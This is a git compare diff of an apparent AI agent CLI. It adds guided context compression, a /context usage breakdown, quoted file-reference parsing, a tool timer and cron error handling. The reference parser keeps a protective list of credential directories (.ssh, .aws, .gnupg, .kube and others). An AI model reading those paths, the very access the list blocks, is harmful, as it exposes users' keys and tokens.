Compare commits
44 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 08b97660c5 | |||
| e8034e2f6a | |||
| dab5ec8245 | |||
| 79565630b0 | |||
| 7033dbf5d6 | |||
| 9555a0cf31 | |||
| f00dd3169f | |||
| 8414f41856 | |||
| 672cc80915 | |||
| fbe28352e4 | |||
| 5b42aecfa7 | |||
| 989b950fbc | |||
| 2a6cbf52d0 | |||
| c5ab760528 | |||
| a4fc38c5b1 | |||
| 0e939af7c2 | |||
| 475cbce775 | |||
| c1f832a610 | |||
| 6f63ba9c8f | |||
| 3e24ba1656 | |||
| d8cd7974d8 | |||
| e8f16f7432 | |||
| e1167c5c07 | |||
| 8254b820ec | |||
| 2b0912ab18 | |||
| ea81aa2eec | |||
| 496e378b10 | |||
| 03f23f10e1 | |||
| 8bcb8b8e87 | |||
| f07b35acba | |||
| 363d5d57be | |||
| 7ccdb74364 | |||
| 6c115440fd | |||
| 4fb42d0193 | |||
| f83e86d826 | |||
| 0bea603510 | |||
| 360b21ce95 | |||
| 37a1c75716 | |||
| c6e1add6f1 | |||
| 2c99b4e79b | |||
| 71036a7a75 | |||
| 7e28b7b5d5 | |||
| a093eb47f7 | |||
| f72faf191c |
@@ -857,7 +857,7 @@ def _read_main_provider() -> str:
|
||||
return ""
|
||||
|
||||
|
||||
def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str], Optional[str]]:
|
||||
"""Resolve the active custom/main endpoint the same way the main CLI does.
|
||||
|
||||
This covers both env-driven OPENAI_BASE_URL setups and config-saved custom
|
||||
@@ -870,18 +870,29 @@ def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
runtime = resolve_runtime_provider(requested="custom")
|
||||
except Exception as exc:
|
||||
logger.debug("Auxiliary client: custom runtime resolution failed: %s", exc)
|
||||
return None, None
|
||||
runtime = None
|
||||
|
||||
if not isinstance(runtime, dict):
|
||||
openai_base = os.getenv("OPENAI_BASE_URL", "").strip().rstrip("/")
|
||||
openai_key = os.getenv("OPENAI_API_KEY", "").strip()
|
||||
if not openai_base:
|
||||
return None, None, None
|
||||
runtime = {
|
||||
"base_url": openai_base,
|
||||
"api_key": openai_key,
|
||||
}
|
||||
|
||||
custom_base = runtime.get("base_url")
|
||||
custom_key = runtime.get("api_key")
|
||||
custom_mode = runtime.get("api_mode")
|
||||
if not isinstance(custom_base, str) or not custom_base.strip():
|
||||
return None, None
|
||||
return None, None, None
|
||||
|
||||
custom_base = custom_base.strip().rstrip("/")
|
||||
if "openrouter.ai" in custom_base.lower():
|
||||
# requested='custom' falls back to OpenRouter when no custom endpoint is
|
||||
# configured. Treat that as "no custom endpoint" for auxiliary routing.
|
||||
return None, None
|
||||
return None, None, None
|
||||
|
||||
# Local servers (Ollama, llama.cpp, vLLM, LM Studio) don't require auth.
|
||||
# Use a placeholder key — the OpenAI SDK requires a non-empty string but
|
||||
@@ -890,20 +901,33 @@ def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
if not isinstance(custom_key, str) or not custom_key.strip():
|
||||
custom_key = "no-key-required"
|
||||
|
||||
return custom_base, custom_key.strip()
|
||||
if not isinstance(custom_mode, str) or not custom_mode.strip():
|
||||
custom_mode = None
|
||||
|
||||
return custom_base, custom_key.strip(), custom_mode
|
||||
|
||||
|
||||
def _current_custom_base_url() -> str:
|
||||
custom_base, _ = _resolve_custom_runtime()
|
||||
custom_base, _, _ = _resolve_custom_runtime()
|
||||
return custom_base or ""
|
||||
|
||||
|
||||
def _try_custom_endpoint() -> Tuple[Optional[OpenAI], Optional[str]]:
|
||||
custom_base, custom_key = _resolve_custom_runtime()
|
||||
runtime = _resolve_custom_runtime()
|
||||
if len(runtime) == 2:
|
||||
custom_base, custom_key = runtime
|
||||
custom_mode = None
|
||||
else:
|
||||
custom_base, custom_key, custom_mode = runtime
|
||||
if not custom_base or not custom_key:
|
||||
return None, None
|
||||
if custom_base.lower().startswith(_CODEX_AUX_BASE_URL.lower()):
|
||||
return None, None
|
||||
model = _read_main_model() or "gpt-4o-mini"
|
||||
logger.debug("Auxiliary client: custom endpoint (%s)", model)
|
||||
logger.debug("Auxiliary client: custom endpoint (%s, api_mode=%s)", model, custom_mode or "chat_completions")
|
||||
if custom_mode == "codex_responses":
|
||||
real_client = OpenAI(api_key=custom_key, base_url=custom_base)
|
||||
return CodexAuxiliaryClient(real_client, model), model
|
||||
return OpenAI(api_key=custom_key, base_url=custom_base), model
|
||||
|
||||
|
||||
|
||||
@@ -267,13 +267,19 @@ class ContextCompressor:
|
||||
|
||||
return "\n\n".join(parts)
|
||||
|
||||
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]]) -> Optional[str]:
|
||||
def _generate_summary(self, turns_to_summarize: List[Dict[str, Any]], focus_topic: str = None) -> Optional[str]:
|
||||
"""Generate a structured summary of conversation turns.
|
||||
|
||||
Uses a structured template (Goal, Progress, Decisions, Files, Next Steps)
|
||||
inspired by Pi-mono and OpenCode. When a previous summary exists,
|
||||
generates an iterative update instead of summarizing from scratch.
|
||||
|
||||
Args:
|
||||
focus_topic: Optional focus string for guided compression. When
|
||||
provided, the summariser prioritises preserving information
|
||||
related to this topic and is more aggressive about compressing
|
||||
everything else. Inspired by Claude Code's ``/compact``.
|
||||
|
||||
Returns None if all attempts fail — the caller should drop
|
||||
the middle turns without a summary rather than inject a useless
|
||||
placeholder.
|
||||
@@ -375,6 +381,14 @@ Target ~{summary_budget} tokens. Be specific — include file paths, command out
|
||||
|
||||
Write only the summary body. Do not include any preamble or prefix."""
|
||||
|
||||
# Inject focus topic guidance when the user provides one via /compress <focus>.
|
||||
# This goes at the end of the prompt so it takes precedence.
|
||||
if focus_topic:
|
||||
prompt += f"""
|
||||
|
||||
FOCUS TOPIC: "{focus_topic}"
|
||||
The user has requested that this compaction PRIORITISE preserving all information related to the focus topic above. For content related to "{focus_topic}", include full detail — exact values, file paths, command outputs, error messages, and decisions. For content NOT related to the focus topic, summarise more aggressively (brief one-liners or omit if truly irrelevant). The focus topic sections should receive roughly 60-70% of the summary token budget."""
|
||||
|
||||
try:
|
||||
call_kwargs = {
|
||||
"task": "compression",
|
||||
@@ -592,7 +606,7 @@ Write only the summary body. Do not include any preamble or prefix."""
|
||||
# Main compression entry point
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def compress(self, messages: List[Dict[str, Any]], current_tokens: int = None) -> List[Dict[str, Any]]:
|
||||
def compress(self, messages: List[Dict[str, Any]], current_tokens: int = None, focus_topic: str = None) -> List[Dict[str, Any]]:
|
||||
"""Compress conversation messages by summarizing middle turns.
|
||||
|
||||
Algorithm:
|
||||
@@ -604,6 +618,12 @@ Write only the summary body. Do not include any preamble or prefix."""
|
||||
|
||||
After compression, orphaned tool_call / tool_result pairs are cleaned
|
||||
up so the API never receives mismatched IDs.
|
||||
|
||||
Args:
|
||||
focus_topic: Optional focus string for guided compression. When
|
||||
provided, the summariser will prioritise preserving information
|
||||
related to this topic and be more aggressive about compressing
|
||||
everything else. Inspired by Claude Code's ``/compact``.
|
||||
"""
|
||||
n_messages = len(messages)
|
||||
# Only need head + 3 tail messages minimum (token budget decides the real tail size)
|
||||
@@ -661,7 +681,7 @@ Write only the summary body. Do not include any preamble or prefix."""
|
||||
)
|
||||
|
||||
# Phase 3: Generate structured summary
|
||||
summary = self._generate_summary(turns_to_summarize)
|
||||
summary = self._generate_summary(turns_to_summarize, focus_topic=focus_topic)
|
||||
|
||||
# Phase 4: Assemble compressed message list
|
||||
compressed = []
|
||||
|
||||
@@ -13,8 +13,9 @@ from typing import Awaitable, Callable
|
||||
|
||||
from agent.model_metadata import estimate_tokens_rough
|
||||
|
||||
_QUOTED_REFERENCE_VALUE = r'(?:`[^`\n]+`|"[^"\n]+"|\'[^\'\n]+\')'
|
||||
REFERENCE_PATTERN = re.compile(
|
||||
r"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>\S+))"
|
||||
rf"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>{_QUOTED_REFERENCE_VALUE}(?::\d+(?:-\d+)?)?|\S+))"
|
||||
)
|
||||
TRAILING_PUNCTUATION = ",.;!?"
|
||||
_SENSITIVE_HOME_DIRS = (".ssh", ".aws", ".gnupg", ".kube", ".docker", ".azure", ".config/gh")
|
||||
@@ -81,14 +82,10 @@ def parse_context_references(message: str) -> list[ContextReference]:
|
||||
value = _strip_trailing_punctuation(match.group("value") or "")
|
||||
line_start = None
|
||||
line_end = None
|
||||
target = value
|
||||
target = _strip_reference_wrappers(value)
|
||||
|
||||
if kind == "file":
|
||||
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
|
||||
if range_match:
|
||||
target = range_match.group("path")
|
||||
line_start = int(range_match.group("start"))
|
||||
line_end = int(range_match.group("end") or range_match.group("start"))
|
||||
target, line_start, line_end = _parse_file_reference_value(value)
|
||||
|
||||
refs.append(
|
||||
ContextReference(
|
||||
@@ -375,6 +372,38 @@ def _strip_trailing_punctuation(value: str) -> str:
|
||||
return stripped
|
||||
|
||||
|
||||
def _strip_reference_wrappers(value: str) -> str:
|
||||
if len(value) >= 2 and value[0] == value[-1] and value[0] in "`\"'":
|
||||
return value[1:-1]
|
||||
return value
|
||||
|
||||
|
||||
def _parse_file_reference_value(value: str) -> tuple[str, int | None, int | None]:
|
||||
quoted_match = re.match(
|
||||
r'^(?P<quote>`|"|\')(?P<path>.+?)(?P=quote)(?::(?P<start>\d+)(?:-(?P<end>\d+))?)?$',
|
||||
value,
|
||||
)
|
||||
if quoted_match:
|
||||
line_start = quoted_match.group("start")
|
||||
line_end = quoted_match.group("end")
|
||||
return (
|
||||
quoted_match.group("path"),
|
||||
int(line_start) if line_start is not None else None,
|
||||
int(line_end or line_start) if line_start is not None else None,
|
||||
)
|
||||
|
||||
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
|
||||
if range_match:
|
||||
line_start = int(range_match.group("start"))
|
||||
return (
|
||||
range_match.group("path"),
|
||||
line_start,
|
||||
int(range_match.group("end") or range_match.group("start")),
|
||||
)
|
||||
|
||||
return _strip_reference_wrappers(value), None, None
|
||||
|
||||
|
||||
def _remove_reference_tokens(message: str, refs: list[ContextReference]) -> str:
|
||||
pieces: list[str] = []
|
||||
cursor = 0
|
||||
|
||||
@@ -213,6 +213,7 @@ _URL_TO_PROVIDER: Dict[str, str] = {
|
||||
"models.github.ai": "copilot",
|
||||
"api.fireworks.ai": "fireworks",
|
||||
"opencode.ai": "opencode-go",
|
||||
"api.x.ai": "xai",
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -487,7 +487,7 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
(True, {}, "") to err on the side of showing the skill.
|
||||
"""
|
||||
try:
|
||||
raw = skill_file.read_text(encoding="utf-8")[:2000]
|
||||
raw = skill_file.read_text(encoding="utf-8")
|
||||
frontmatter, _ = parse_frontmatter(raw)
|
||||
|
||||
if not skill_matches_platform(frontmatter):
|
||||
@@ -495,7 +495,7 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
|
||||
return True, frontmatter, extract_skill_description(frontmatter)
|
||||
except Exception as e:
|
||||
logger.debug("Failed to parse skill file %s: %s", skill_file, e)
|
||||
logger.warning("Failed to parse skill file %s: %s", skill_file, e)
|
||||
return True, {}, ""
|
||||
|
||||
|
||||
@@ -558,9 +558,10 @@ def build_skills_system_prompt(
|
||||
# ── Layer 1: in-process LRU cache ─────────────────────────────────
|
||||
# Include the resolved platform so per-platform disabled-skill lists
|
||||
# produce distinct cache entries (gateway serves multiple platforms).
|
||||
from gateway.session_context import get_session_env
|
||||
_platform_hint = (
|
||||
os.environ.get("HERMES_PLATFORM")
|
||||
or os.environ.get("HERMES_SESSION_PLATFORM")
|
||||
or get_session_env("HERMES_SESSION_PLATFORM")
|
||||
or ""
|
||||
)
|
||||
cache_key = (
|
||||
|
||||
@@ -145,10 +145,11 @@ def get_disabled_skill_names(platform: str | None = None) -> Set[str]:
|
||||
if not isinstance(skills_cfg, dict):
|
||||
return set()
|
||||
|
||||
from gateway.session_context import get_session_env
|
||||
resolved_platform = (
|
||||
platform
|
||||
or os.getenv("HERMES_PLATFORM")
|
||||
or os.getenv("HERMES_SESSION_PLATFORM")
|
||||
or get_session_env("HERMES_SESSION_PLATFORM")
|
||||
)
|
||||
if resolved_platform:
|
||||
platform_disabled = (skills_cfg.get("platform_disabled") or {}).get(
|
||||
|
||||
@@ -1048,7 +1048,7 @@ def _termux_example_image_path(filename: str = "cat.png") -> str:
|
||||
|
||||
|
||||
def _split_path_input(raw: str) -> tuple[str, str]:
|
||||
"""Split a leading file path token from trailing free-form text.
|
||||
r"""Split a leading file path token from trailing free-form text.
|
||||
|
||||
Supports quoted paths and backslash-escaped spaces so callers can accept
|
||||
inputs like:
|
||||
@@ -1719,6 +1719,7 @@ class HermesCLI:
|
||||
self._secret_state = None
|
||||
self._secret_deadline = 0
|
||||
self._spinner_text: str = "" # thinking spinner text for TUI
|
||||
self._tool_start_time: float = 0.0 # monotonic timestamp when current tool started (for live elapsed)
|
||||
self._command_running = False
|
||||
self._command_status = ""
|
||||
self._attached_images: list[Path] = []
|
||||
@@ -2130,6 +2131,7 @@ class HermesCLI:
|
||||
if not text:
|
||||
self._flush_reasoning_preview(force=True)
|
||||
self._spinner_text = text or ""
|
||||
self._tool_start_time = 0.0 # clear tool timer when switching to thinking
|
||||
self._invalidate()
|
||||
|
||||
# ── Streaming display ────────────────────────────────────────────────
|
||||
@@ -4960,7 +4962,9 @@ class HermesCLI:
|
||||
elif canonical == "fast":
|
||||
self._handle_fast_command(cmd_original)
|
||||
elif canonical == "compress":
|
||||
self._manual_compress()
|
||||
self._manual_compress(cmd_original)
|
||||
elif canonical == "context":
|
||||
self._show_context_breakdown()
|
||||
elif canonical == "usage":
|
||||
self._show_usage()
|
||||
elif canonical == "insights":
|
||||
@@ -5816,8 +5820,14 @@ class HermesCLI:
|
||||
self._reasoning_preview_buf = getattr(self, "_reasoning_preview_buf", "") + reasoning_text
|
||||
self._flush_reasoning_preview(force=False)
|
||||
|
||||
def _manual_compress(self):
|
||||
"""Manually trigger context compression on the current conversation."""
|
||||
def _manual_compress(self, cmd_original: str = ""):
|
||||
"""Manually trigger context compression on the current conversation.
|
||||
|
||||
Accepts an optional focus topic: ``/compress <focus>`` guides the
|
||||
summariser to preserve information related to *focus* while being
|
||||
more aggressive about discarding everything else. Inspired by
|
||||
Claude Code's ``/compact <focus>`` feature.
|
||||
"""
|
||||
if not self.conversation_history or len(self.conversation_history) < 4:
|
||||
print("(._.) Not enough conversation to compress (need at least 4 messages).")
|
||||
return
|
||||
@@ -5830,16 +5840,28 @@ class HermesCLI:
|
||||
print("(._.) Compression is disabled in config.")
|
||||
return
|
||||
|
||||
# Extract optional focus topic from the command (e.g. "/compress database schema")
|
||||
focus_topic = ""
|
||||
if cmd_original:
|
||||
parts = cmd_original.strip().split(None, 1)
|
||||
if len(parts) > 1:
|
||||
focus_topic = parts[1].strip()
|
||||
|
||||
original_count = len(self.conversation_history)
|
||||
try:
|
||||
from agent.model_metadata import estimate_messages_tokens_rough
|
||||
approx_tokens = estimate_messages_tokens_rough(self.conversation_history)
|
||||
print(f"🗜️ Compressing {original_count} messages (~{approx_tokens:,} tokens)...")
|
||||
if focus_topic:
|
||||
print(f"🗜️ Compressing {original_count} messages (~{approx_tokens:,} tokens), "
|
||||
f"focus: \"{focus_topic}\"...")
|
||||
else:
|
||||
print(f"🗜️ Compressing {original_count} messages (~{approx_tokens:,} tokens)...")
|
||||
|
||||
compressed, _new_system = self.agent._compress_context(
|
||||
self.conversation_history,
|
||||
self.agent._cached_system_prompt or "",
|
||||
approx_tokens=approx_tokens,
|
||||
focus_topic=focus_topic or None,
|
||||
)
|
||||
self.conversation_history = compressed
|
||||
new_count = len(self.conversation_history)
|
||||
@@ -5852,6 +5874,198 @@ class HermesCLI:
|
||||
except Exception as e:
|
||||
print(f" ❌ Compression failed: {e}")
|
||||
|
||||
def _show_context_breakdown(self):
|
||||
"""Show a live breakdown of context window usage by component.
|
||||
|
||||
Inspired by Claude Code's ``/context`` command — gives users visibility
|
||||
into what is consuming their context window (system prompt, memory,
|
||||
skills, context files, conversation messages, tool results, etc.).
|
||||
"""
|
||||
if not self.agent:
|
||||
print("(._.) No active agent — send a message first.")
|
||||
return
|
||||
|
||||
from agent.model_metadata import (
|
||||
estimate_tokens_rough,
|
||||
estimate_messages_tokens_rough,
|
||||
)
|
||||
|
||||
agent = self.agent
|
||||
compressor = getattr(agent, "context_compressor", None)
|
||||
context_length = getattr(compressor, "context_length", 0) or 0
|
||||
if not context_length:
|
||||
from agent.model_metadata import get_model_context_length
|
||||
context_length = get_model_context_length(agent.model or "")
|
||||
|
||||
# ── System prompt breakdown ────────────────────────────────
|
||||
system_prompt = getattr(agent, "_cached_system_prompt", "") or ""
|
||||
system_total = estimate_tokens_rough(system_prompt)
|
||||
|
||||
# Attempt to break down the system prompt into its component layers.
|
||||
# The prompt is assembled by joining parts with "\n\n", so we can
|
||||
# identify known sections by their content signatures.
|
||||
components = []
|
||||
if system_prompt:
|
||||
from agent.prompt_builder import load_soul_md, DEFAULT_AGENT_IDENTITY
|
||||
# Identity block
|
||||
soul = load_soul_md()
|
||||
if soul and soul[:60] in system_prompt:
|
||||
identity_tokens = estimate_tokens_rough(soul)
|
||||
components.append((" Identity (SOUL.md)", identity_tokens))
|
||||
elif DEFAULT_AGENT_IDENTITY[:40] in system_prompt:
|
||||
identity_tokens = estimate_tokens_rough(DEFAULT_AGENT_IDENTITY)
|
||||
components.append((" Identity (built-in)", identity_tokens))
|
||||
|
||||
# Memory
|
||||
mem_store = getattr(agent, "_memory_store", None)
|
||||
if mem_store:
|
||||
mem_block = mem_store.format_for_system_prompt("memory")
|
||||
if mem_block and mem_block[:30] in system_prompt:
|
||||
components.append((" Memory", estimate_tokens_rough(mem_block)))
|
||||
user_block = mem_store.format_for_system_prompt("user")
|
||||
if user_block and user_block[:30] in system_prompt:
|
||||
components.append((" User profile", estimate_tokens_rough(user_block)))
|
||||
|
||||
# Skills
|
||||
skills_marker = "## Skills (mandatory)"
|
||||
if skills_marker in system_prompt:
|
||||
skills_start = system_prompt.index(skills_marker)
|
||||
# Find the next major section after skills
|
||||
_next_sections = ["\nConversation started:", "\nYou are running as"]
|
||||
skills_end = len(system_prompt)
|
||||
for _sect in _next_sections:
|
||||
idx = system_prompt.find(_sect, skills_start + 10)
|
||||
if idx != -1:
|
||||
skills_end = min(skills_end, idx)
|
||||
skills_text = system_prompt[skills_start:skills_end]
|
||||
components.append((" Skills index", estimate_tokens_rough(skills_text)))
|
||||
|
||||
# Context files (AGENTS.md, .cursorrules, etc.)
|
||||
ctx_marker = "# Project Context"
|
||||
if ctx_marker in system_prompt:
|
||||
ctx_start = system_prompt.index(ctx_marker)
|
||||
ctx_text = system_prompt[ctx_start:]
|
||||
# Trim to just the context files section
|
||||
for _end_mark in ["\nConversation started:", "\n## Skills"]:
|
||||
idx = ctx_text.find(_end_mark, 10)
|
||||
if idx != -1:
|
||||
ctx_text = ctx_text[:idx]
|
||||
break
|
||||
components.append((" Context files", estimate_tokens_rough(ctx_text)))
|
||||
|
||||
# Tool-use guidance, platform hints, timestamps — remainder
|
||||
accounted = sum(t for _, t in components)
|
||||
remainder = max(0, system_total - accounted)
|
||||
if remainder > 50:
|
||||
components.append((" Other (guidance, hints, timestamp)", remainder))
|
||||
|
||||
# ── Conversation breakdown ─────────────────────────────────
|
||||
msgs = self.conversation_history or []
|
||||
msg_counts = {"user": 0, "assistant": 0, "tool": 0, "system": 0}
|
||||
msg_tokens = {"user": 0, "assistant": 0, "tool": 0, "system": 0}
|
||||
tool_result_tokens = 0
|
||||
tool_call_tokens = 0
|
||||
compaction_summary_tokens = 0
|
||||
|
||||
from agent.context_compressor import SUMMARY_PREFIX, LEGACY_SUMMARY_PREFIX
|
||||
for msg in msgs:
|
||||
role = msg.get("role", "unknown")
|
||||
content = msg.get("content", "")
|
||||
content_str = str(content) if content else ""
|
||||
tokens = estimate_tokens_rough(content_str)
|
||||
|
||||
# Count tool_calls in assistant messages
|
||||
tool_calls = msg.get("tool_calls")
|
||||
if tool_calls:
|
||||
tc_str = str(tool_calls)
|
||||
tool_call_tokens += estimate_tokens_rough(tc_str)
|
||||
|
||||
if role in msg_counts:
|
||||
msg_counts[role] += 1
|
||||
msg_tokens[role] += tokens
|
||||
else:
|
||||
msg_counts.setdefault(role, 0)
|
||||
msg_tokens.setdefault(role, 0)
|
||||
msg_counts[role] += 1
|
||||
msg_tokens[role] += tokens
|
||||
|
||||
if role == "tool":
|
||||
tool_result_tokens += tokens
|
||||
|
||||
# Detect compaction summaries
|
||||
if content_str and (SUMMARY_PREFIX in content_str or LEGACY_SUMMARY_PREFIX in content_str):
|
||||
compaction_summary_tokens += tokens
|
||||
|
||||
conversation_total = estimate_messages_tokens_rough(msgs)
|
||||
|
||||
# ── Tool schemas ───────────────────────────────────────────
|
||||
tool_schemas_tokens = 0
|
||||
try:
|
||||
tool_schemas = getattr(agent, "_cached_tool_schemas", None)
|
||||
if tool_schemas:
|
||||
tool_schemas_tokens = estimate_tokens_rough(str(tool_schemas))
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Grand total ────────────────────────────────────────────
|
||||
grand_total = system_total + conversation_total + tool_schemas_tokens
|
||||
percent = round((grand_total / context_length) * 100) if context_length else 0
|
||||
|
||||
# ── Render ─────────────────────────────────────────────────
|
||||
def _bar(tokens, total, width=20):
|
||||
if total <= 0:
|
||||
return ""
|
||||
filled = max(0, min(width, round((tokens / total) * width)))
|
||||
return "█" * filled + "░" * (width - filled)
|
||||
|
||||
def _fmt(tokens):
|
||||
if tokens >= 1000:
|
||||
return f"{tokens / 1000:.1f}K"
|
||||
return str(tokens)
|
||||
|
||||
print()
|
||||
model_short = (agent.model or "unknown").split("/")[-1]
|
||||
print(f"◎ Context Window — {model_short}")
|
||||
print(f" {_bar(grand_total, context_length, 30)} {_fmt(grand_total)} / {_fmt(context_length)} tokens ({percent}%)")
|
||||
print()
|
||||
|
||||
# System prompt
|
||||
print(f" ◆ System Prompt {_fmt(system_total):>8}")
|
||||
for label, toks in components:
|
||||
print(f" {label:<28} {_fmt(toks):>8}")
|
||||
|
||||
# Tool schemas
|
||||
if tool_schemas_tokens:
|
||||
n_tools = len(tool_schemas) if tool_schemas else 0
|
||||
print(f" ◆ Tool Schemas ({n_tools} tools) {_fmt(tool_schemas_tokens):>8}")
|
||||
|
||||
# Conversation
|
||||
total_msgs = sum(msg_counts.values())
|
||||
print(f" ◆ Conversation ({total_msgs} msgs) {_fmt(conversation_total):>8}")
|
||||
if msg_counts.get("user", 0):
|
||||
print(f" User messages ({msg_counts['user']}) {_fmt(msg_tokens['user']):>8}")
|
||||
if msg_counts.get("assistant", 0):
|
||||
print(f" Assistant messages ({msg_counts['assistant']}) {_fmt(msg_tokens['assistant']):>8}")
|
||||
if msg_counts.get("tool", 0):
|
||||
print(f" Tool results ({msg_counts['tool']}) {_fmt(tool_result_tokens):>8}")
|
||||
if tool_call_tokens:
|
||||
print(f" Tool calls {_fmt(tool_call_tokens):>8}")
|
||||
if compaction_summary_tokens:
|
||||
print(f" Compaction summaries {_fmt(compaction_summary_tokens):>8}")
|
||||
|
||||
# Compression info
|
||||
compressions = getattr(compressor, "compression_count", 0) or 0
|
||||
if compressions:
|
||||
print(f"\n ⚙ Compressions this session: {compressions}")
|
||||
|
||||
# Threshold info
|
||||
if compressor:
|
||||
threshold = getattr(compressor, "threshold_tokens", 0) or 0
|
||||
if threshold:
|
||||
remaining = max(0, threshold - grand_total)
|
||||
print(f" ⚙ Auto-compress at: ~{_fmt(threshold)} tokens ({_fmt(remaining)} remaining)")
|
||||
print()
|
||||
|
||||
def _show_usage(self):
|
||||
"""Show rate limits (if available) and session token usage."""
|
||||
if not self.agent:
|
||||
@@ -6145,11 +6359,20 @@ class HermesCLI:
|
||||
Updates the TUI spinner widget so the user can see what the agent
|
||||
is doing during tool execution (fills the gap between thinking
|
||||
spinner and next response). Also plays audio cue in voice mode.
|
||||
|
||||
On tool.started, records a monotonic timestamp so get_spinner_text()
|
||||
can show a live elapsed timer (the TUI poll loop already invalidates
|
||||
every ~0.15s, so the counter updates automatically).
|
||||
"""
|
||||
# Only act on tool.started; ignore tool.completed, reasoning.available, etc.
|
||||
if event_type == "tool.completed":
|
||||
import time as _time
|
||||
self._tool_start_time = 0.0
|
||||
self._invalidate()
|
||||
return
|
||||
if event_type != "tool.started":
|
||||
return
|
||||
if function_name and not function_name.startswith("_"):
|
||||
import time as _time
|
||||
from agent.display import get_tool_emoji
|
||||
emoji = get_tool_emoji(function_name)
|
||||
label = preview or function_name
|
||||
@@ -6158,6 +6381,7 @@ class HermesCLI:
|
||||
if _pl > 0 and len(label) > _pl:
|
||||
label = label[:_pl - 3] + "..."
|
||||
self._spinner_text = f"{emoji} {label}"
|
||||
self._tool_start_time = _time.monotonic()
|
||||
self._invalidate()
|
||||
|
||||
if not self._voice_mode:
|
||||
@@ -7999,7 +8223,7 @@ class HermesCLI:
|
||||
agent_name = get_active_skin().get_branding("agent_name", "Hermes Agent")
|
||||
msg = f"\n{agent_name} has been suspended. Run `fg` to bring {agent_name} back."
|
||||
def _suspend():
|
||||
os.write(1, msg.encode())
|
||||
os.write(1, msg.encode("utf-8", errors="replace"))
|
||||
os.kill(0, _sig.SIGTSTP)
|
||||
run_in_terminal(_suspend)
|
||||
|
||||
@@ -8359,6 +8583,17 @@ class HermesCLI:
|
||||
txt = cli_ref._spinner_text
|
||||
if not txt:
|
||||
return []
|
||||
# Append live elapsed timer when a tool is running
|
||||
t0 = cli_ref._tool_start_time
|
||||
if t0 > 0:
|
||||
import time as _time
|
||||
elapsed = _time.monotonic() - t0
|
||||
if elapsed >= 60:
|
||||
_m, _s = int(elapsed // 60), int(elapsed % 60)
|
||||
elapsed_str = f"{_m}m {_s}s"
|
||||
else:
|
||||
elapsed_str = f"{elapsed:.1f}s"
|
||||
return [('class:hint', f' {txt} ({elapsed_str})')]
|
||||
return [('class:hint', f' {txt}')]
|
||||
|
||||
def get_spinner_height():
|
||||
@@ -8893,6 +9128,7 @@ class HermesCLI:
|
||||
finally:
|
||||
self._agent_running = False
|
||||
self._spinner_text = ""
|
||||
self._tool_start_time = 0.0
|
||||
|
||||
app.invalidate() # Refresh status line
|
||||
|
||||
|
||||
+10
-7
@@ -31,7 +31,7 @@ except ImportError:
|
||||
# Configuration
|
||||
# =============================================================================
|
||||
|
||||
HERMES_DIR = get_hermes_home()
|
||||
HERMES_DIR = get_hermes_home().resolve()
|
||||
CRON_DIR = HERMES_DIR / "cron"
|
||||
JOBS_FILE = CRON_DIR / "jobs.json"
|
||||
OUTPUT_DIR = CRON_DIR / "output"
|
||||
@@ -338,10 +338,12 @@ def load_jobs() -> List[Dict[str, Any]]:
|
||||
save_jobs(jobs)
|
||||
logger.warning("Auto-repaired jobs.json (had invalid control characters)")
|
||||
return jobs
|
||||
except Exception:
|
||||
return []
|
||||
except IOError:
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error("Failed to auto-repair jobs.json: %s", e)
|
||||
raise RuntimeError(f"Cron database corrupted and unrepairable: {e}") from e
|
||||
except IOError as e:
|
||||
logger.error("IOError reading jobs.json: %s", e)
|
||||
raise RuntimeError(f"Failed to read cron database: {e}") from e
|
||||
|
||||
|
||||
def save_jobs(jobs: List[Dict[str, Any]]):
|
||||
@@ -452,6 +454,7 @@ def create_job(
|
||||
"last_run_at": None,
|
||||
"last_status": None,
|
||||
"last_error": None,
|
||||
"last_delivery_error": None,
|
||||
# Delivery configuration
|
||||
"deliver": deliver,
|
||||
"origin": origin, # Tracks where job was created for "origin" delivery
|
||||
@@ -620,8 +623,8 @@ def mark_job_run(job_id: str, success: bool, error: Optional[str] = None,
|
||||
|
||||
save_jobs(jobs)
|
||||
return
|
||||
|
||||
save_jobs(jobs)
|
||||
|
||||
logger.warning("mark_job_run: job_id %s not found, skipping save", job_id)
|
||||
|
||||
|
||||
def advance_next_run(job_id: str) -> bool:
|
||||
|
||||
+1
-1
@@ -769,7 +769,7 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
|
||||
_cron_pool.shutdown(wait=False, cancel_futures=True)
|
||||
raise
|
||||
finally:
|
||||
_cron_pool.shutdown(wait=False)
|
||||
_cron_pool.shutdown(wait=False, cancel_futures=True)
|
||||
|
||||
if _inactivity_timeout:
|
||||
# Build diagnostic summary from the agent's activity tracker.
|
||||
|
||||
@@ -9,7 +9,10 @@ INSTALL_DIR="/opt/hermes"
|
||||
# (cache/images, cache/audio, platforms/whatsapp, etc.) are created on
|
||||
# demand by the application — don't pre-create them here so new installs
|
||||
# get the consolidated layout from get_hermes_dir().
|
||||
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills}
|
||||
# The "home/" subdirectory is a per-profile HOME for subprocesses (git,
|
||||
# ssh, gh, npm …). Without it those tools write to /root which is
|
||||
# ephemeral and shared across profiles. See issue #4426.
|
||||
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills,skins,plans,workspace,home}
|
||||
|
||||
# .env
|
||||
if [ ! -f "$HERMES_HOME/.env" ]; then
|
||||
|
||||
@@ -642,6 +642,8 @@ def load_gateway_config() -> GatewayConfig:
|
||||
